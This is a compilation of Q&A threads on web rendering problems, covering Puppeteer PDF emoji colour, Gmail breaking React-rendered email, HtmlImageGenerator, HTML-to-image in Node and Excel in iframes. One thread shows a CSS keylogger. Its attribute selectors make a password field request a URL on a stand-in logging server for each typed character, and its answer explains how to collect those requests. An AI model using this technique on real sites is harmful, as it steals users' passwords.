Emoji greyed out in PDF output from Chrome Headless - puppeteer

(Note: even though this mentions Pyppeteer, the Python port of Puppeteer, the API calls are the same in both, so this applies to either Puppeteer or Pyppeteer.)
Hi,
I'm converting the page http://getemoji.com/ into PDF using the following code:
import asyncio
from pyppeteer import launch
from pyppeteer.launcher import connect
async def main():
    browser = await launch()
    context = await browser.createIncognitoBrowserContext()
    page = await context.newPage()
    page.on('dialog', lambda dialog: dialog.dismiss())
    # await page.emulateMedia('print')
    await page.goto('http://getemoji.com/')
    await page.screenshot({'path': 'example.png'})
    await context.close()
    await browser.disconnect()
asyncio.get_event_loop().run_until_complete(main())
It correctly generates the following image:
But if I try to convert the page into PDF, like this:
await page.pdf({
    'path': 'example.pdf',
    'format': 'A4'
})
All the emoticons are greyed in the resulting PDF, like this:
The issue is not a font issue with the emoji, since they work perfectly on the screenshot. It's something related to how the PDF is generated, but I can't find out why.
I'm hoping you'll find it :)

I came across the same issue and did some searching. The issue seems to be twofold.
The first part is, as you guessed, the CSS rules for print media. The site uses a Bootstrap CSS file that has the following rules:
@media print {
    * {
        color: #000!important;
        text-shadow: none!important;
        background: 0 0!important;
        box-shadow: none!important
    }
    ...
}
This is a blanket rule that forces the foreground color of all content to black when printing.
Fortunately, Pyppeteer provides an API to set the media type used when rendering the content: page.emulateMedia. Passing it the 'screen' argument makes the page ignore the print media rules. If you use this, you will see that some of the content now has colors, and the links look better too.
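As a rough sketch of that first fix, the PDF call from the question could be preceded by page.emulateMedia('screen'). The function names save_pdf_with_screen_media and main below are made up for illustration, and the pyppeteer import is done inside the function only so the snippet can be loaded without pyppeteer installed. This only addresses the print CSS rules, not the second issue described next.

```python
import asyncio


async def save_pdf_with_screen_media(url: str, pdf_path: str) -> None:
    """Render `url` to a PDF while applying screen (not print) CSS rules."""
    # Imported lazily (an assumption of this sketch) so that defining the
    # function does not require pyppeteer to be installed.
    from pyppeteer import launch

    browser = await launch()
    try:
        page = await browser.newPage()
        # Ask Chrome to apply 'screen' media rules, so @media print is skipped.
        await page.emulateMedia('screen')
        await page.goto(url)
        # Same PDF options as in the question.
        await page.pdf({'path': pdf_path, 'format': 'A4'})
    finally:
        await browser.close()


def main() -> None:
    # Hypothetical entry point using the URL and file name from the question.
    asyncio.run(save_pdf_with_screen_media('http://getemoji.com/', 'example.pdf'))
```

Calling main() needs pyppeteer and a downloadable Chromium, so treat it as something to try locally rather than a guaranteed result.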
The second issue seems to be the way Chrome prints a PDF. Pyppeteer actually uses the 'Print to PDF' functionality provided by Chrome, so the issue is not really with Pyppeteer.
To confirm this, I created a simple webpage which had some emojis and did not have any print media CSS. When I manually opened the page in Chrome and saved it as a PDF, the emojis appeared in black.


How do you make a Keylogger with CSS?

input[type="password"][value$="a"] {
    background-image: url("http://localhost:3000/a");
}
const inp = document.querySelector("input");
inp.addEventListener("keyup", (e) => {
    inp.setAttribute('value', inp.value)
});
This is what I've found, but I don't think it works. How do I do it?
Edit: I realised that the CSS snippet alone won't work, as typing in the input field does not change the value attribute of the HTML element. A JavaScript function is required to do this. Hence, include the JavaScript lines at the end of your snippet in a script tag and then it should work.
The CSS Keylogger was originally a thought experiment, as explained in this LiveOverflow video. The snippet you are using assumes that http://localhost:3000/ is a malicious Web server which records your HTTP requests.
In this case entering "a" on the keyboard (in the input field) would send a request to http://localhost:3000/a (for fetching the background image) which you may intercept as "a" on the Web server. You may write a NodeJS or Python Web server to intercept these requests and get the keystrokes.

HTML e-mail generated by React breaks in GMail web client

I needed to generate a newsletter e-mail server-side. I researched various options, but I picked React (server-side rendering) because of good TypeScript support and my familiarity with that technology.
Generating an e-mail that displays correctly in GMail (or any other popular client) is a very tricky subject, as one needs to use a small (and legacy) subset of HTML. But that's a separate issue.
So I've crafted a test e-mail with React SSR, using the subset of HTML supported by GMail. To be sure, I've checked it with the W3C validator and it passed.
But when I sent the generated HTML output to a GMail address and displayed it in the GMail desktop web application, the output was a mess. In the mail HTML presented in the browser, some elements had missing inline CSS properties, while others were outside of their original parents.
How can I generate an e-mail using React that doesn't break in the GMail web application?
React's renderToString function (and probably the similar ones, too) emits single-line minified HTML output without any line length limit.
For reasons I don't understand, such single-line HTML documents can "break" the GMail HTML parser and cause glitchy output.
But, on the other hand, resources online actually recommend minifying e-mail HTML, as whitespace can (reportedly) be interpreted inconsistently across e-mail clients. So pretty-printing the HTML output doesn't sound like a good idea.
A solution is to re-minify the HTML document, but with a line length limit. To be safe, I've set the limit quite low. I've used the popular html-minifier package.
import * as React from "react";
import { minify } from "html-minifier";
import { renderToString } from "react-dom/server";
export const renderMyMail = (params: MyMailParams): string => {
    const reactHtmlString = renderToString(MyMail({ params }));
    const reminifiedHtmlString = minify(reactHtmlString, { maxLineLength: 255, keepClosingSlash: true });
    return reminifiedHtmlString;
};
Now, the e-mail displays correctly in the GMail web application.
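To illustrate what a line length limit on minified HTML means, here is a small Python sketch of the idea. It is not html-minifier's actual algorithm: wrap_minified_html and max_line_length are names invented for this example, and it assumes that ">" only ever appears as the end of a tag (so no raw ">" inside text, attribute values, or style blocks). Note that a newline is still whitespace, so a break between two inline elements may render as a space.

```python
import re


def wrap_minified_html(html: str, max_line_length: int = 255) -> str:
    """Break single-line HTML into lines, splitting only right after '>'."""
    # Each chunk is either text ending in '>' or a trailing run without '>'.
    chunks = re.findall(r"[^>]*>|[^>]+$", html)
    lines = []
    current = ""
    for chunk in chunks:
        # Start a new line when adding this chunk would exceed the limit.
        if current and len(current) + len(chunk) > max_line_length:
            lines.append(current)
            current = chunk
        else:
            current += chunk
    if current:
        lines.append(current)
    # A single chunk longer than the limit is kept whole on its own line.
    return "\n".join(lines)
```

Removing the newlines from the result gives back the original string, so the markup itself is untouched; only the line breaks are added.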

Rendering a pdf file from an html view to display it on a web page as a image preview

I need to create a pdf preview that should be displayed on a web page as an image. The pdf file is just a simple report built on almost plain HTML. Essentially I had a problem with displaying checkboxes; I have now replaced them with pictures of checkboxes, but the issue remains the same.
Here is how I create the pdf report from my HTML view with the help of Groovy and Grails:
def html = htmlRenderService.getReport(info)
ByteArrayOutputStream out = new ByteArrayOutputStream()
// Render the HTML to an image and write it out as PNG bytes
HtmlImageGenerator htmlImageGenerator = new HtmlImageGenerator()
htmlImageGenerator.loadHtml(html)
BufferedImage bi = htmlImageGenerator.bufferedImage
ImageIO.write(bi, "PNG", out)
byte[] bytes = out.toByteArray()
// encoder is not shown in the question; presumably a java.util.Base64.Encoder
String base64bytes = encoder.encodeToString(bytes)
String src = "data:image/png;base64," + base64bytes
out.flush()
def getReport(Info info) {
    return groovyPageRenderer.render(view: REPORT_VIEW,
            model: [info: info])
}
Then I send the src string to my view and render it as: <img src="${src}" alt=""/>
My checkbox picture looks like this: <div style="/*style stuff*/ background-image: url(data:image/png;base64,LINK_TO_THE_IMAGE)"></div>
In the end, I got a picture of my pdf report that rendered pretty well and displayed as an image on my page, BUT without checkboxes. Here is the picture of one part of it:
And here is the same part, but from the pdf document which I rendered in the same way and just downloaded directly from my webapp:
Here is an example where I combined both options (input checkbox and image checkbox) and rendered it as an image:
So what could cause this issue? Thank you in advance.
UPDATE: Today I came across this comment under another issue with HtmlImageGenerator:
HtmlImageGenerator seems to use a JEditorPane for rendering the HTML. Swing HTML support does not extend to the ability to render data images. It might be possible by digging into the HTMLEditorKit and changing the image loading element to support data images, but then you'd need to find a way to get HtmlImageGenerator to use the altered editor pane.
It seems that HtmlImageGenerator doesn't work well with images inside HTML files, but it's still unclear why it doesn't render checkbox inputs either.
Without seeing the markup you end up with after page load, it's hard to say. Check the Chrome dev tools panel to see whether the image has actually loaded correctly on the page, which will tell you it's at least accessible. Then check whether the url is output correctly to the div as the background-image. If it looks correct and there aren't related errors in the console, it is likely a CSS setting.
With background images, your container will need to contain content, or else you will need to specify a width, a height, a display setting, a background-position, and a background-size.
If you can upload more info, I might be able to be more specific.

How to convert HTML to image in Node.js

I need to convert an HTML template into an image, on a Node server.
The server will receive the HTML as a string. I tried PhantomJS (using a library called Webshot), but it doesn't work well with flexbox and modern CSS. I tried to use headless Chrome, but it doesn't seem to have an API for loading an HTML string, only a URL.
What is the currently best way to convert a piece of HTML into image?
Is there a way to use headless Chrome in a template mode instead of URL mode? I mean, instead of doing something like
chrome.goTo('http://test.com')
I need something like:
chrome.evaluate('<div>hello world</div>');
Another option, suggested in the comments to this post, is to save the template in a file on the server, serve it locally, and do something like:
chrome.goTo('http://localhost/saved_template');
But this option sounds a bit awkward. Is there any other, more straightforward solution?
You can use a library called Puppeteer.
Sample code snippet:
const puppeteer = require('puppeteer');
(async () => {
    // imgHTML is the HTML string received by the server
    const browser = await puppeteer.launch();
    const page = await browser.newPage();
    await page.setViewport({
        width: 960,
        height: 760,
        deviceScaleFactor: 1,
    });
    await page.setContent(imgHTML);
    await page.screenshot({path: 'example.png'});
    await browser.close();
})();
This will save a screenshot of the HTML as example.png in the current working directory.
You can easily do it on the frontend using html2canvas. On the backend, you can write the HTML to a file and access it using a file URI (e.g. file:///home/user/path/to/your/file.html); it should work fine with headless Chrome and Nightmare (screenshot feature). Another option is to set up a simple HTTP server and access the URL.
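The file URI approach can be sketched roughly like this, in Python here to keep it short (the same idea applies in Node with fs.writeFile and url.pathToFileURL). The helper name write_html_to_temp_file is hypothetical, and using a temporary file rather than a fixed path is my own assumption.

```python
import tempfile
from pathlib import Path


def write_html_to_temp_file(html: str) -> str:
    """Write `html` to a temporary .html file and return its file:// URI."""
    # delete=False keeps the file on disk after the handle is closed, so a
    # headless browser can open it; the caller should remove it afterwards.
    with tempfile.NamedTemporaryFile(
        "w", suffix=".html", delete=False, encoding="utf-8"
    ) as handle:
        handle.write(html)
    # as_uri() needs an absolute path; resolve() guarantees that.
    return Path(handle.name).resolve().as_uri()
```

The returned URI is what you would pass to the browser's navigation call (the goTo/goto step in the question) before taking the screenshot.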

Excel file downloads instead of displaying in iframe

I have this in my controller class:
public ActionResult ExcelDoc()
{
    var doc = Server.MapPath("~/Content/Sheet1.xlsx");
    return File(doc, "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet");
}
And in my view:
<iframe src="/Centres/ExcelDoc"></iframe>
It simply DOES NOT display the file in the iframe. Instead, it begins downloading sheet1.xlsx as ExcelDoc.xlsx. Very frustrating as previous questions have helped me to develop this solution to my previous problem of trying to display a dynamically generated excel file in an iframe. I am using Google Chrome, if that is relevant.
Returning a file makes your browser try to download it; that's expected behaviour. I don't think it's possible to display an Excel file as-is in your browser window, unless you use something like a plug-in.